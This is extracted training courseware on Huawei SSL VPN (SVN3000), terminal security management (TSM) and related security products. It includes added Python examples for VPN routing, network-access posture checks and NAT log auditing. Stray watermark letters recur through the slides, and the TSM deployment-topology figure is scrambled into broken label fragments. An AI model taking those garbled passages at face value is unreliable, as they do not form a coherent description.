[Figure: Partner, Mobile office, Branch, Remote maintenance and Client reach the SVN3000 at the headquarters over encrypted connections; the SVN3000 reaches the Web server, ERP, Email, NFS and Database over standard internal connections.]

Generally, the SVN3000 is deployed between the enterprise edge firewall and the application servers.

The SVN3000 sits between the remote user and the server and is responsible for controlling the communication between them.

SSL VPN Application Scenario: One-Armed Mode

The SVN3000 is connected to the firewall, router, or switch in one-armed mode: it communicates with both the intranet and the Internet over a single network interface, which is known as the one-armed communication mode.

[Figure: Partner, Mobile office, Branch, Remote maintenance and Client -> Internet -> enterprise headquarters, where the SVN3000 hangs off a single interface and reaches Email, Database, ERP, AAA and Web server.]

SSL VPN Application Scenario: Two-Armed Mode

The SVN3000 is connected to the firewall, router, or switch in two-armed mode: it communicates with the intranet and the Internet over different network interfaces, which is known as the two-armed communication mode.

[Figure: the same topology with the SVN3000 in line between an Internet-facing interface and an intranet-facing interface.]

Enabling the Web NMS Function

Take the SVN3000 as an example. Configuration process:

1. Configure the interface IP address.

2. Bind the Web NMS to the IP address, and specify the port used for the binding.

3. Start the Web browser and enter the address of the SVN3000 Web NMS in the address box, for example https://x.x.x.x:port. Press Enter to open the Web NMS login page.

4. Enter the user name and password on the login page to log in to the SVN3000.

Configuring the Virtual Gateway and Related Parameters

[Screenshot]

After logging in to the SVN3000 Web NMS, click Virtual Gateway Management.

Web Proxy Access Instance (1)

[Screenshot]

On the Virtual Gateway List navigation tree, click Web proxy to enter the configuration page.

Web Proxy Access Instance (2)

[Screenshot]

Configure the Web-link resources and enable the Web-Link function.

Web Proxy Access Instance (3)

[Screenshot]

When you click a link, the corresponding linked Web page is displayed.

Web Proxy Access Instance (4)

[Screenshot]

When you click a sub-link on the Web page, the corresponding linked Web page is also displayed.

File Sharing Access Instance (1)

[Screenshot]

On the Virtual Gateway List navigation tree, click File Sharing to enter the configuration page.

File Sharing Access Instance (2)

[Screenshot]

Configure the file sharing resources and enable the file sharing function.

File Sharing Access Instance (3)

[Screenshot: file sharing resource list displayed on the client]

File Sharing Access Instance (4)

[Screenshot]

Click a resource in the file sharing list. Enter the user name, password, and domain; the information is submitted to the file server for authentication.

File Sharing Access Instance (5)

[Screenshot: list of resources in the shared folder]

Port Forwarding

The port forwarding function provides access to various TCP application services on the intranet.

Supports TCP applications over static ports:

Single-port single-server (Telnet, SSH, MS RDP, and VNC)

Single-port multi-server (Lotus Notes)

Multi-port multi-server (Outlook)

Supports TCP applications over dynamic ports (FTP passive mode, Oracle)

Provides port-level access control

Port Forwarding Application Instance (1)

[Screenshot]

On the Virtual Gateway List navigation tree, click Port Forwarding to enter the configuration page.

Port Forwarding Application Instance (2)

[Screenshot]

Configure the port forwarding resources and enable the port forwarding function.

n
e
/

m
o
c
Port Forwarding Application Instance (3)

Click Start to enable the port forwarding function.
Port Forwarding Application Instance (4)

Access the configured resources using the port forwarding function, for example, Telnet.
Network Extension Access Instance (1)

Configure the IP address allocation mode and client routing mode.
Enable the network extension function.
Network Extension Access Instance (2)

Click the button to start the network extension function.
Network Extension Access Instance (3)

After the ActiveX control is installed, log in to the SVN3000 again on the remote client. The client is allocated a virtual IP address of the intranet and functions as a device on the LAN.

Note: During the operation, do not close this window. Otherwise, the network extension function is disabled.
Network Extension Access Instance (4)

Application instance: log in to the remote desktop and browse the video files on the intranet.
Application instance: FTP.
Login Interface of Network Extension Client

The network extension function can also be implemented by installing the dedicated client software. You can download the software from the SVN3000 interface. The software needs to be installed only once and requires no configuration. You can directly enable the network extension function using the network extension client software.
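Network extension gives the remote client an intranet virtual IP address and a set of routes; how much of the client's traffic those routes pull into the tunnel is what the client routing mode decides. The following Python is an added example, not SVN3000 code: an address pool that leases one virtual IP per client, and a route builder for two assumed routing modes ("all-traffic" and "intranet-only"); the pool, gateway address and subnets are constructed values. The detail worth noticing is the host route to the gateway in all-traffic mode: without it the tunnel's own TLS packets would be routed into the tunnel.

```python
import ipaddress


class VirtualIpPool:
    """Leases intranet addresses to network-extension clients, lowest free address first."""

    def __init__(self, network, reserved=()):
        self.network = ipaddress.ip_network(network)
        reserved = {ipaddress.ip_address(r) for r in reserved}
        self.free = [ip for ip in self.network.hosts() if ip not in reserved]
        self.leases = {}                        # client id -> IPv4Address

    def allocate(self, client_id):
        if client_id in self.leases:            # re-login keeps the address it already holds
            return self.leases[client_id]
        if not self.free:
            raise RuntimeError("virtual IP pool exhausted")
        ip = self.free.pop(0)
        self.leases[client_id] = ip
        return ip

    def release(self, client_id):
        ip = self.leases.pop(client_id, None)
        if ip is not None:
            self.free.append(ip)
            self.free.sort()
        return ip


def client_routes(mode, gateway_ip, intranet_subnets):
    """Routes the client installs for the given routing mode (mode names are assumed).
    'all-traffic' sends everything through the tunnel but keeps a host route to the
    gateway on the physical link; 'intranet-only' (split tunnel) routes just the
    configured intranet subnets."""
    routes = [(f"{gateway_ip}/32", "physical")]
    if mode == "all-traffic":
        routes.append(("0.0.0.0/0", "tunnel"))
    elif mode == "intranet-only":
        routes += [(str(ipaddress.ip_network(s)), "tunnel") for s in intranet_subnets]
    else:
        raise ValueError(f"unknown routing mode {mode!r}")
    return routes


def tunnelled(routes, dst):
    """Longest-prefix match over the route list: does traffic to dst enter the tunnel?"""
    addr = ipaddress.ip_address(dst)
    best = None
    for prefix, iface in routes:
        net = ipaddress.ip_network(prefix)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, iface)
    return best is not None and best[1] == "tunnel"


if __name__ == "__main__":
    pool = VirtualIpPool("10.10.10.0/29", reserved=["10.10.10.1"])   # constructed pool
    print("alice gets", pool.allocate("alice"))
    for mode in ("all-traffic", "intranet-only"):
        routes = client_routes(mode, "203.0.113.5", ["10.0.0.0/8"])
        print(mode, "8.8.8.8 tunnelled:", tunnelled(routes, "8.8.8.8"),
              "gateway tunnelled:", tunnelled(routes, "203.0.113.5"))
```

In all-traffic mode the gateway's /32 wins the longest-prefix match against the default route, so only the gateway itself stays on the physical interface; in intranet-only mode the client keeps direct Internet access, which is the trade-off between a tighter egress path and a usable remote desktop.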
VPNDB Application Instance (1)

Click VPNDB Configuration to enter the configuration interface.
VPNDB Application Instance (2)

Click Add in User Information Management to enter the configuration interface.
Summary

- SSL VPN technology
- Basic functions and features of the SVN3000
- Methods for configuring the SSL VPN
Questions

- What scenarios does the SSL VPN apply to?
- What functions does the virtual gateway of the SSL VPN provide?
- What are the differences between the exclusive and shared virtual gateways? What are their respective application scenarios?
- What are the application scenarios of the Web proxy, file sharing, port forwarding, and network extension functions?
- What are the three access modes of the network extension function? What are the differences between their implementation mechanisms?
- What security services does the SSL VPN provide?
Answer
Thank you
www.huawei.com
Chapter 11 Terminal Security
Objectives

Upon completion of this course, you will be able to describe:
- Terminal security
- Components and deployment of the TSM system
- Organization management and access control modes of the TSM system
- Configuration of security policies for the TSM system
Contents

1. Overview of Terminal Security
2. Deployment of the TSM System
3. Deployment of Terminal Security Policies
Most Threats Come from Intranets

The figure on this slide lists 14 security threats that should not be ignored in enterprises.

According to the Computer Security Institute (CSI) in San Francisco, California, United States, about 60% to 80% of network misuse events come from intranets.

Figure: an intranet with a file server, mail server, and Web server.
Crises Surrounding Enterprise Terminals

- Endless terminal exceptions
- Failures to prevent disclosures
- Unauthorized access
- Unintentional disclosure
- Intentional disclosure
- Doing things irrelevant to work during working hours
- Accessing resources not related to work
- Misuse of network resources
- Slow computer speed
- Network or software exceptions
- Frequent system crashes
- Difficulty in enforcing codes of conduct
- Too many problems to monitor
- Unexpected network threats
- Slow network speed
- Service interruption
- Service exceptions
What Is Terminal Security?

Software terminal security:
- Patch management software
- Personal firewall
- Antivirus software

3-D defense:
- Access control + desktop management + security management
Overview of the TSM System Architecture

Figure: composition of the TSM system.
- TSM domains: pre-authentication domain (SM, SC), isolation domain (AV server, patch server, repair server), post-authentication domain (file server, mail server, OA server)
- Access modes of terminals: 802.1X switch, SACG, common switch
- Clients: Agent (users of an enterprise), Web Agent, Web (guests); manager of an enterprise
Centralized Deployment

Figure: a single TSM server in the pre-authentication domain; post-authentication domains 1 to 3; AD domain server, AV server, and patch server; a SACG in front of the domains; branch terminals (SA) reaching the SACG over the Internet through a VPN gateway.
Distributed Deployment

Figure: an SM at the headquarters and an SC per site (Office A, Office B, branch), each site with its own SACG; core resource server in the post-authentication domain; antivirus server and AD domain server; pre-authentication domain on the intranet; border router to the Internet; terminals (SA) in each site.
Access Control of the SACG

Figure: a hardware SACG in front of the post-authentication domain (sensitive resources) and the TSM server.
- Finance department: no TSM Agent is installed on new employees' terminals. Marketing department: Agents are installed.
- Identity authentication: user name + password, LDAP, or MAC. URL redirection: the SACG provides the Web pushing function to download the TSM Agent for installation.
- Security check:
  - Is the antivirus software running?
  - Are the OS, Office, Internet Explorer, and database patches installed?
  - Is the virus database updated?
  - Is any illegitimate software installed?
- Pre-authentication domain: public resources. Isolation domain: AV server and other repair servers.
- Switchover to the post-authentication domain: the TSM notifies the SACG to deliver ACL rules and switch the terminal to the post-authentication domain.
- Automatic security repair: upgrade the antivirus software, update the virus database, download patches automatically.
Access Control of Host Firewall

Figure: access control based on the host firewall.
- Trusted domain 1: finance department. Trusted domain 2: marketing department. Access between trusted domains is not allowed. External untrusted terminals cannot access trusted terminals.
- Identity authentication: user name + password, LDAP, or MAC.
- Security policy check:
  - Is the antivirus software running?
  - Is the virus database updated?
  - Are the OS, Office, IE, and database patches installed?
  - Is any illegal software installed?
- If the security check fails, only restricted network resources are provided to isolate threats (isolation domain: AV server, patch server).
- Switch to the post-authentication domain: the TSM specifies an access policy to control the trusted domain and post-authentication domain that a terminal can access.
- Automatic security repair.
802.1X Access Control

Figure: 802.1X access control with Terminal 1 and Terminal 2 on an 802.1X switch.
- Ports of an insecure terminal are disabled, and neighbor terminals cannot be accessed through these ports.
- 802.1X authentication: user name + password, LDAP, or MAC.
- Security policy check:
  - Is the antivirus software running?
  - Is the virus database updated?
  - Are the OS, Office, IE, and database patches installed?
  - Is any illegitimate software installed?
- Dynamic VLAN switching: the switch dynamically switches the VLAN to control the post-authentication domain that a terminal can access.
- Isolation domain: AV server, patch server. TSM server.
- Automatic security repair.
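The three access control modes above share one decision flow: authenticate the user, run the security-policy checks, place the terminal in the pre-authentication, isolation, or post-authentication domain, and enforce that placement with an ACL (SACG mode) or a VLAN (802.1X mode) while automatic repair runs. The following Python is an added example modelling that flow, written for this page and not TSM code; the patch identifiers, software blacklist, subnets, VLAN IDs and ACL rule syntax are assumed values.

```python
from dataclasses import dataclass, field
from datetime import date, timedelta

PRE_AUTH, ISOLATION, POST_AUTH = "pre-authentication", "isolation", "post-authentication"

# Constructed policy values for the example (assumed, not TSM defaults).
MAX_SIGNATURE_AGE = timedelta(days=7)
REQUIRED_PATCHES = {"OS-KB1", "OFFICE-KB2", "IE-KB3", "DB-KB4"}
SOFTWARE_BLACKLIST = {"p2p-downloader", "unapproved-remote-control"}

# Assumed network layout: what each domain may reach, and the VLAN it maps to.
DOMAIN_SUBNETS = {
    PRE_AUTH: ["10.0.0.0/24"],                                  # TSM server and Agent download page
    ISOLATION: ["10.0.0.0/24", "10.0.1.0/24"],                  # plus AV, patch and repair servers
    POST_AUTH: ["10.0.0.0/24", "10.0.1.0/24", "10.1.0.0/16"],   # plus business servers
}
DOMAIN_VLANS = {PRE_AUTH: 10, ISOLATION: 20, POST_AUTH: 100}


@dataclass
class Posture:
    """What the Agent reports about one terminal."""
    authenticated: bool
    av_running: bool
    signature_date: date
    installed_patches: set = field(default_factory=set)
    installed_software: set = field(default_factory=set)


def failed_checks(posture, today):
    """The four security-policy checks from the slides; returns the failures found."""
    failures = []
    if not posture.av_running:
        failures.append("antivirus software not running")
    if today - posture.signature_date > MAX_SIGNATURE_AGE:
        failures.append("virus database outdated")
    missing = REQUIRED_PATCHES - posture.installed_patches
    if missing:
        failures.append("patches missing: " + ", ".join(sorted(missing)))
    illegal = posture.installed_software & SOFTWARE_BLACKLIST
    if illegal:
        failures.append("illegitimate software installed: " + ", ".join(sorted(illegal)))
    return failures


def classify(posture, today):
    """Domain the terminal belongs in, plus the reasons when it is isolated."""
    if not posture.authenticated:
        return PRE_AUTH, []
    failures = failed_checks(posture, today)
    return (ISOLATION if failures else POST_AUTH), failures


def sacg_acl(terminal_ip, domain):
    """SACG mode: ACL delivered to the SACG for this terminal (assumed rule syntax).
    Only the domain's subnets are permitted; everything else is denied explicitly."""
    rules = [f"permit ip source {terminal_ip} destination {net}" for net in DOMAIN_SUBNETS[domain]]
    rules.append(f"deny ip source {terminal_ip} destination any")
    return rules


def dot1x_vlan(domain):
    """802.1X mode: VLAN the switch moves the terminal's port into."""
    return DOMAIN_VLANS[domain]


def repair_actions(failures):
    """Automatic security repair steps from the slides, chosen from the failed checks."""
    actions = []
    for failure in failures:
        if failure.startswith("antivirus"):
            actions.append("upgrade the antivirus software")
        elif failure.startswith("virus database"):
            actions.append("update the virus database")
        elif failure.startswith("patches"):
            actions.append("download patches automatically")
        else:
            actions.append("notify the administrator")   # illegitimate software is not auto-repaired
    return actions


def admit(posture, terminal_ip, today, mode):
    """End-to-end decision for one terminal; mode is 'sacg' or '802.1x'."""
    domain, failures = classify(posture, today)
    enforcement = sacg_acl(terminal_ip, domain) if mode == "sacg" else dot1x_vlan(domain)
    return {"domain": domain, "enforcement": enforcement, "repair": repair_actions(failures)}
```

Two properties of the model are the ones to keep when building the real thing: an unauthenticated terminal never reaches the isolation subnets, and the ACL for every domain ends in an explicit deny, so a terminal that is moved between domains is never left with a stale permit from its previous placement.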

n
e
/

Major Functions of the TSM System

Access control:
- Guest management
- Exceptional device management
- Forced compliance evaluation
- Access range of authorized users
- Identity authentication: anonymous/local account, AD/third-party LDAP, PKI/CA
- Compliance check: security evaluation, system configuration check
- User access binding
- One-key automatic repair
- Time-based NAC

Security management:
- Security enhancement: antivirus, patch/service pack, suspicious process/registry, dangerous port/service, software blacklist/whitelist, illegal sharing/account security, illegal network configuration
- Office behavior management: network access auditing, media downloading, non-office software, terminal online record
- Customized security policies
- Information disclosure prevention: peripheral management, portable storage management, network access monitoring, monitoring of illegal external connections, file operation auditing
- Network protection: ARP protection, IP/MAC binding, traffic auditing, IP access rules, control of malicious network programs, Internet-intranet connection monitoring, IP device access auditing

Desktop management:
- Patch management: one-stop download and installation, close cooperation with WSUS, quick subnet distribution
- Asset management: lifecycle management, asset change alarm management, automatic IP device identification
- Software distribution
- Remote assistance
- Message announcement
- Network identification

Platform: operability reports, process policy model, authority- and domain-based management, scalable and upgradeable policy and reporting service.
Organization Management Function (Management Dimension I)

Screenshot: organization management page.
Network Domain Management (Management Dimension II)

Screenshot: network domain management page.
Identity Authentication Function

- Ordinary user name + password authentication
- MAC account authentication
- AD account authentication
- LDAP authentication
- Support for USB key authentication
Security Policy: Checking a Shared Directory

Screenshot: policy configuration page.
Security Policy: Checking Printer Sharing

Screenshot: policy configuration page.
Security Policy: Monitoring USB Storage Devices

Screenshot: policy configuration page.
Security Policy: Monitoring Computer Peripherals

Screenshot: policy configuration page.
Security Policy: Checking Ports

Screenshot: policy configuration page.
Security Policy: Monitoring DHCP Settings

Screenshot: policy configuration page.
Security Policy: Checking Illegal External Connections

Screenshot: policy configuration page.
Security Policy: Checking Antivirus Software

Screenshot: policy configuration page.
Security Policy: Checking Patches

Screenshot: policy configuration page.
Summary

- Terminal security
- Components and deployment of the TSM system
- Organization management and access control modes of the TSM system
- Configuration of security policies for the TSM system
Questions

- What is the TSM? What terminal security problems can the TSM system resolve?
- What components does the TSM system consist of?
- What roles do the SM and SC play in the TSM system? Which component exchanges services with the SACG?
- What are the two management dimensions of the TSM system? What are the differences between them?
- What identity authentication modes does the TSM system support? What are the differences between them?
- What security policies does the TSM system involve? What problems do these security policies solve?
Answer
Thank you
www.huawei.com
Chapter 12 Introduction to Huawei Security Products
Objectives

Upon completion of this course, you will be able to describe:
- USG series firewalls
- VPN gateway products
- Security software products
- SIG products
- NIP products
- Anti-DDoS solution
Contents

1. Huawei Security Products Overview
2. USG Series Products Overview
3. VPN Gateway Products Overview
4. Security Software Products Overview
5. SIG Products Overview
6. NIP Products Overview
7. Anti-DDoS Solution Overview
Security Products Overview

Figure: Huawei security product portfolio.

Security services (ability center and service center):
- Spam database
- Application protocol category database (DPI)
- URL category database
- Virus/malware signature database
- Intrusion/vulnerability signature database
- Botnet signature database
- Reputation evaluation center
- Online upgrade platform
- Emergent security fault response
- Security management center, security management services, security consulting

Network and content security:
- Firewall/UTM: USG2000, USG5000, USG9000
- Secure routing gateway: USG2000 BSR/HSR, USG5000 BSR/HSR
- Anti-DDoS solution: USG5000-ADI/ADD, USG9000, ATIC
- SSL VPN: SVN3000
- IDS: NIP1000, NIP200

Security software:
- Terminal security management: TSM
- Document security management: DSM
- Security management: VSM (security management center), eLog (unified log management and audit)
Huawei USG Series Products

Figure: product positioning. Models, from the smallest up: USG2110; USG2130, USG2130W, USG2160, USG2160W; USG2205; USG2210, USG2230; USG2250, USG2260; USG5120, USG5150. Scenarios covered: remote site, office, small branch, large branch, small enterprise headquarters, enterprise headquarters.
USG2110 Fixed Model

Fixed configuration:
- 2WAN + 8FE (desktop model)
Features:
- Basic firewall/VPN functions
- PPPoA/DDNS/TR069
Performance:
- Firewall throughput (large packets): 150 Mbit/s
- Number of concurrent connections: 100,000
Positioning: SOHO users (1U to 20U)

Model             Description
USG2110-F         2FE+8FE, 1USB
USG2110-F-W       2FE+8FE, 1USB, WiFi
USG2110-A-W       1FE, 1ADSL+8FE, 1USB, WiFi
USG2110-A-GW-C    1FE, 1ADSL+8FE, 1USB, WiFi, 3G-CDMA2000
USG2110-A-GW-W    1FE, 1ADSL+8FE, 1USB, WiFi, 3G-WCDMA
USG2110-A-GW-T    1FE, 1ADSL+8FE, 1USB, WiFi, 3G-TD-SCDMA
USG2100 Series

- 1FE + 8FE (chassis model)
- 1 or 2 expansion slots (USG2130/USG2160): Serial/E1/ADSL2+/FE/GE/3G/G.SHDSL
- Built-in WiFi (-W models)
- Complete UTM features (license control): IPS/antivirus/anti-spam/URL filtering
- IPv6 support
- VPN functions: L2TP/SSL/IPSec/MPLS/GRE
Performance:
- Firewall throughput (large packets): 200 Mbit/s
- Number of concurrent connections: 200,000
Positioning: small branch users (30U to 100U)

Model         Description
USG2130       1FE+8FE, 1USB, 1MIC
USG2130-W     1FE+8FE, 1USB, 1MIC, WiFi
USG2160       1FE+8FE, 1USB, 2MIC
USG2160-W     1FE+8FE, 1USB, 2MIC, WiFi
USG2200 Series

- 2GE Combo (chassis model)
- 4MIC + 2FIC expansion slots: FE/GE/Serial/E1/ADSL2+/G.SHDSL/3G/WiFi
- Multi-service open platform (x86)
- Complete UTM features (license control): IPS/antivirus/anti-spam/URL filtering
- IPv6 support
- VPN functions: L2TP/SSL/IPSec/MPLS/GRE
- DC power model: USG2250
Positioning: medium-sized enterprise users (200U to 500U)

Model           Description
USG2210         2GE Combo, 2USB, 4MIC+2FIC
USG2220         2GE Combo, 2USB, 4MIC+2FIC
USG2230         2GE Combo, 2USB, 4MIC+2FIC
USG2250 AC/DC   2GE Combo, 2USB, 4MIC+2FIC
USG5120

- 2GE + 2GE Combo (chassis model)
- 4MIC + 2FIC + 2DFIC expansion slots: FE/GE/Serial/E1/ADSL2+/G.SHDSL/3G/WiFi
- Multi-service open platform (x86)
- Complete UTM features (license control): IPS/antivirus/anti-spam/URL filtering
- IPv6 support
- VPN functions: L2TP/SSL/IPSec/MPLS/GRE
- DC power model available
Performance:
- Firewall throughput (large packets): 2000 Mbit/s
- Number of concurrent connections: 1 million
Positioning: medium-sized enterprise users (500U to 700U)

Model         Description
USG5120       2GE+2GE Combo, 2USB, 4MIC+2FIC+2DFIC
USG5120-DC    2GE+2GE Combo, 2USB, 4MIC+2FIC+2DFIC, DC power supply
USG5150

- 4GE Combo (chassis model)
- 4MIC + 2FIC + 4DFIC expansion slots: FE/GE/Serial/E1/ADSL2+/G.SHDSL/3G/WiFi
- Multi-service open platform (x86)
- Complete UTM features (license control): IPS/antivirus/anti-spam/URL filtering
- IPv6 support
- VPN functions: L2TP/SSL/IPSec/MPLS/GRE
- 1+1 redundant power supply
Performance:
- Firewall throughput (large packets): 4000 Mbit/s
- Number of concurrent connections: 2 million
Positioning: medium-sized enterprise users (800U to 1000U)

Model         Description
USG5150       4GE Combo, 2USB, 4MIC+2FIC+4DFIC
USG5150-DC    4GE Combo, 2USB, 4MIC+2FIC+4DFIC, DC power supply
Application Scenario of Enterprise Security Protection

Figure: enterprise headquarters (USG5150, USG5120), enterprise branch and regional office (USG2200), remote site (USG2100), and enterprise partner, connected over the Internet by VPNs.
Application Scenario of Enterprise VPN Access

Figure: a USG5150 at the enterprise headquarters terminates IPSec VPN tunnels over the Internet from branch devices (USG2210, USG2130, USG2230) with ADSL, E1, and FE uplinks.
Functions of the SVN3000

SVN3000 secure access gateway:
- Advanced virtual gateway
- Web proxy
- File sharing
- Port proxy
- Network extension
- Complete logging functions
- User security control
Carrier-Class Hardware Platform of the SVN3000

Item                     SVN3000
Ports                    Fixed ports: 3 x 10/100/1000M combo ports
Power supply             Dual power supply; AC: 100 V to 240 V, 50/60 Hz; DC: -48 V to -60 V
Dimensions (H x W x D)   1U: 44.45 mm x 436 mm x 420 mm, for 19-inch cabinets
Fans                     7 built-in fans
Front Panel of the SVN3000

Port                  Type                                   Rate
PORT0, PORT1, PORT2   RJ45/SFP (electrical/optical) combo    10/100/1000M
Console               RJ45                                   9,600 bit/s

Indicator   Meaning
PWR0        PWR0 state
PWR1        PWR1 state
SYS         System state
ACT         Active/standby state
Rear Panel of the SVN3000

Figure: rear panel of the SVN3000 AC model.
Figure: rear panel of the SVN3000 DC model.
Typical Networking of the SVN3000

Figure: users in a residential building, a hotel, a business hall, and mobile office employees access intranet servers (file server, Web server, mail server, SMC, NMS, BOSS) through the SVN3000.

- Free of client: a terminal accesses the application system through a Web browser without installing special software.
- WYSIWYG: requested resources are displayed on the Web page item by item, forming a clear view of the available intranet services.
- Fast deployment: deployed without changing the intranet topology; simple user and permission management achieved through user-friendly Web pages.
- Best access experience.
Terminal Security Management (TSM) System Overview

Product positioning:
- All-in-one terminal security solution for enterprises
Application scenarios:
- Secure terminal access and security policy management
- Employee behavior auditing and mobile device management
- Asset management, software distribution, and patch management
Key performance:
- Supports mainstream Windows operating systems, including 2000/XP/Vista/Windows 7
- A single server supports up to 20,000 concurrent users
Product features:
- Distributed deployment architecture providing industry-leading performance, reliability, and scalability, eliminating network bottlenecks on network devices

Figure: Secospace TSM with access control, security policy management, patch management, software distribution, asset management, and employee behavior management.
Functions of the TSM

Terminal security management solution:

Security access control:
- SACG mode
- 802.1X control mode
- Host firewall-based access control mode
- AD/LDAP/CA interworking authentication
- Agent client
- Non-Agent IE controller

Security policy check:
- Antivirus software interworking check
- Operating system, IE, and Office patch check
- Host security check covering system accounts and registries
- Shared file and printer check
- One-click intelligent recovery

User behavior audit:
- Access behavior management
- PC peripheral management
- USB device monitoring
- Illegitimate external connection management
- ARP protection
- Network traffic monitoring
- Process and service monitoring

Patch management:
- WSUS interworking
- User-defined patch distribution policy
- Efficient patch distribution based on patented technologies
- Patch filtering
- Patch statistics and reports

Software distribution:
- Time-specific software distribution tasks
- Resumable download and integrity check
- Automatic running of executable files
- Detailed distribution status reports

Asset management:
- Asset registration
- Asset lifecycle management
- Asset statistics
- Software license management
- Asset change alarm
- Server platform monitoring
- Bulletin and remote assistance
TSM Deployment Topology

TSM management center (TMC, optional)

Security Manager (SM)

Security Controller (SC)

Security Access Control Gateway (SACG)

Security Agent (SA)

Service server 1

w
a
Upper-level
system administrator
u
h
.
g
n
ni

TMC

WAN

Pre-authentication

TSM
management
node 1

.
i
e

domain

r
a
le

/
/
p:

TSM
management
node n

t
t
Post-authenticationh
domain
:
s
e
c
r
u
so

SM SC

Service server 2

Pre-authentication
SM SC

Post-authentication
domain

Service server 1

Service server 2

Patch server

Core Network

SACG

ar

ni

e
r
o

ng

e A
LProvince

Re

domain

Patch server

Core Network

Antivirus (AV) server

AV server
SACG

File repair

File repair server

server

Isolation

Isolation
domain

domain

Province B

Copyrig ht 2010 Hua w ei Technologies Co., Lt d. All right s reserved.

Pa ge 22

Document Security Management (DSM) System Overview

Product positioning: Enterprise document security solution

Application scenarios:
- Preventing unauthorized document use by employees
- Preventing information disclosure through document spreading
- Auditing document use

Key performance:
- A single server supports up to 20,000 users, 200 concurrent users, and a throughput of 2,000 users/minute
- Supports mainstream document types such as Word, PPT, Excel, PDF, and JPG
- Supports document permissions such as read-only, read-write, replication, distribution, print (number of times controllable), full control, and offline use

Product features: Dynamic encryption and decryption combining the application and driver layers, real-time permission management, centralized key management, complete log auditing, and centralized and distributed deployment; a high-availability, high-performance, and scalable architecture providing a unified and powerful document security management platform.

[Figure: Secospace DSM function overview. Document permission management: powerful dynamic encryption and decryption technologies; real-time document permission control; group policy and permission templates. User management: account and department management; user roaming; cross-system authorization. Log auditing: Web client login logs; document operation logs.]

DSM Deployment

[Figure: Secospace DSM functions. Document permission management: powerful dynamic encryption and decryption technologies; real-time document permission management; group policy and permission template. User management: account and department management; user roaming; cross-system authorization. Log auditing: Web client login logs; document operation logs.]

DSM Deployment Topology

Components:
- DSM management center (DMC)
- DSM server (DS)
- DSM client (DC)

[Figure: DSM deployment topology. Labels: System administrator; DMC; DSM management nodes with DS1 and DS2; Core network; DSM clients (DC) in Province A and Province B.]

Functions of the eLog Log Management System

NAT log management:
- NAT logs of firewalls, routers, and BRAS devices
- Translation records of source IP addresses, source ports, destination IP addresses, destination ports, and protocol type

Network traffic auditing:
- Working with the UTM device to provide an intuitive view of the basic traffic, application traffic, interface traffic, and P2P traffic in the form of reports
- Displaying multi-dimensional statistics of intrusion prevention system (IPS), mail filtering, virus detection, URL auditing, instant messaging (IM), and defense services, and printing the statistics in the form of reports

Database and operating system auditing:
- Auditing the database through the off-line deployment of the behavior auditing probe
- Auditing the operating system by collecting system logs

Application-layer protocol (FTP/Telnet/HTTP) translation, behavior monitoring, and restoration:
- Through the behavior auditing probe for network resources

Unified log management platform:
- Network devices, security devices, hosts, Web servers, and application systems

Rich alarm management functions:
- Alarming by means of mail, short message, alarm box, and audible and visual alarms
- Alarm monitoring and alarm statistics
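The NAT log management function above keeps the translation tuples (source address and port, translated address and port, destination, protocol) so that a public address and port seen by an outside party can be traced back to the internal host that held it at that moment. The block below is an added example written for this page, not eLog code: the log line format, addresses and timestamps are constructed for illustration and do not reproduce any Huawei device's actual log format.

```python
"""NAT log correlation, in the spirit of the eLog NAT log management function.

Added example for this page, not eLog code.  The line format below is
constructed for illustration; real NAT syslog formats differ per device.
"""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Optional

TS_FMT = "%Y-%m-%d %H:%M:%S"

# Constructed sample: one line per NAT session open/close event.
# Public port 40001 is reused by two different internal hosts at different
# times, which is exactly what an audit lookup must get right.
SAMPLE_NAT_LOG = """\
2010-05-01 10:00:00 NAT open proto=tcp src=10.1.1.10:51234 nat=203.0.113.5:40001 dst=198.51.100.7:80
2010-05-01 10:00:02 NAT open proto=tcp src=10.1.1.11:51000 nat=203.0.113.5:40002 dst=198.51.100.7:443
2010-05-01 10:00:05 NAT open proto=udp src=10.1.1.13:5060 nat=203.0.113.5:5060 dst=198.51.100.20:5060
2010-05-01 10:05:00 NAT close proto=tcp src=10.1.1.10:51234 nat=203.0.113.5:40001 dst=198.51.100.7:80
2010-05-01 10:06:00 NAT open proto=tcp src=10.1.1.12:60000 nat=203.0.113.5:40001 dst=192.0.2.9:22
2010-05-01 10:30:00 NAT close proto=tcp src=10.1.1.12:60000 nat=203.0.113.5:40001 dst=192.0.2.9:22
this line is not a NAT record and is skipped by the parser
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) NAT (?P<event>open|close) "
    r"proto=(?P<proto>\w+) src=(?P<src>[\d.]+):(?P<sport>\d+) "
    r"nat=(?P<nat>[\d.]+):(?P<nport>\d+) dst=(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


@dataclass
class NatSession:
    proto: str
    src_ip: str
    src_port: int
    nat_ip: str
    nat_port: int
    dst_ip: str
    dst_port: int
    opened: datetime
    closed: Optional[datetime] = None  # None while the session is still open


def parse_nat_log(text):
    """Pair open/close events into NatSession records keyed by the full tuple."""
    sessions = []
    open_by_key = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated line; a real collector would count these
        ts = datetime.strptime(m["ts"], TS_FMT)
        key = (m["proto"], m["src"], int(m["sport"]),
               m["nat"], int(m["nport"]), m["dst"], int(m["dport"]))
        if m["event"] == "open":
            session = NatSession(*key, opened=ts)
            sessions.append(session)
            open_by_key[key] = session
        else:
            session = open_by_key.pop(key, None)
            if session is not None:
                session.closed = ts
    return sessions


def find_internal_host(sessions, nat_ip, nat_port, proto, at):
    """Return (private IP, private port) behind nat_ip:nat_port/proto at time 'at'.

    'at' may be a datetime or a string in TS_FMT.  Returns None if no session
    covered that moment, which is the honest answer when the port was idle.
    """
    if isinstance(at, str):
        at = datetime.strptime(at, TS_FMT)
    for s in sessions:
        if (s.nat_ip, s.nat_port, s.proto) != (nat_ip, nat_port, proto):
            continue
        if s.opened <= at and (s.closed is None or at <= s.closed):
            return (s.src_ip, s.src_port)
    return None


SESSIONS = parse_nat_log(SAMPLE_NAT_LOG)

if __name__ == "__main__":
    print(find_internal_host(SESSIONS, "203.0.113.5", 40001, "tcp", "2010-05-01 10:03:00"))
```

The lookup keys on protocol as well as address and port, and it checks the time of the query against the session's open and close times; without both, a public port that was reused by a second host later in the day would be attributed to the wrong machine, which is the usual failure of NAT audits that store only a static mapping.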

Overview of the Versatile Security Management (VSM) System

